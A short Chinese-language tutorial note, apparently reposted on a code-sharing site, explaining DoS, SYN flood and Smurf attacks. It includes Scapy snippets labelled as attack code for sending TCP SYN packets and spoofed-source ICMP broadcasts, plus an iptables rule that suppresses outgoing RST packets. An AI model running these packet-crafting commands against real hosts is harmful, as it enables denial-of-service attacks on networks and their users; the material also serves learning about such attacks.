Dos拒絕服務Syn-Flood泛洪攻擊--Smurf 攻擊(一)


Dos拒絕服務
利用程序漏洞或一對一資源耗盡的Denial of Service 拒絕服務
DDos 分布式拒絕服務 多對一

 


 

Syn-Flood泛洪攻擊

發送syn包欺騙服務器建立半連接

攻擊代碼,利用scapy

Scapy
– i=IP()
– i.dst=1.1.1.1
– i.display()
– t=TCP()
– sr1(i/t,verbose=1,timeout=3)
– sr1(IP(dst=1.1.1.1)/TCP())

防火牆配置關閉本機發送rst包

RST包的作用:告訴服務器我不和你建立連接,計算機在接收到服務器的ack+syn包的時候,系統會自動發送RST

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP //指定IP,關閉本地發送Rst包
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' //查看本機tcp連接數

 

 

Smurf 攻擊
最古老的DDos攻擊技術
技術原理:利用icmp包,偽造源IP發廣播包,廣播局域網內的所有計算機回復廣播包給偽造的IP,造成攻擊對偽造IP的效果
對現在的操作系統幾乎無效(不響應廣播包)

攻擊實現代碼:

Scapy
– i=IP()
– i.dst="1.1.1.255"
– p=ICMP()
– p.display()
– r=(i/p)
– send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM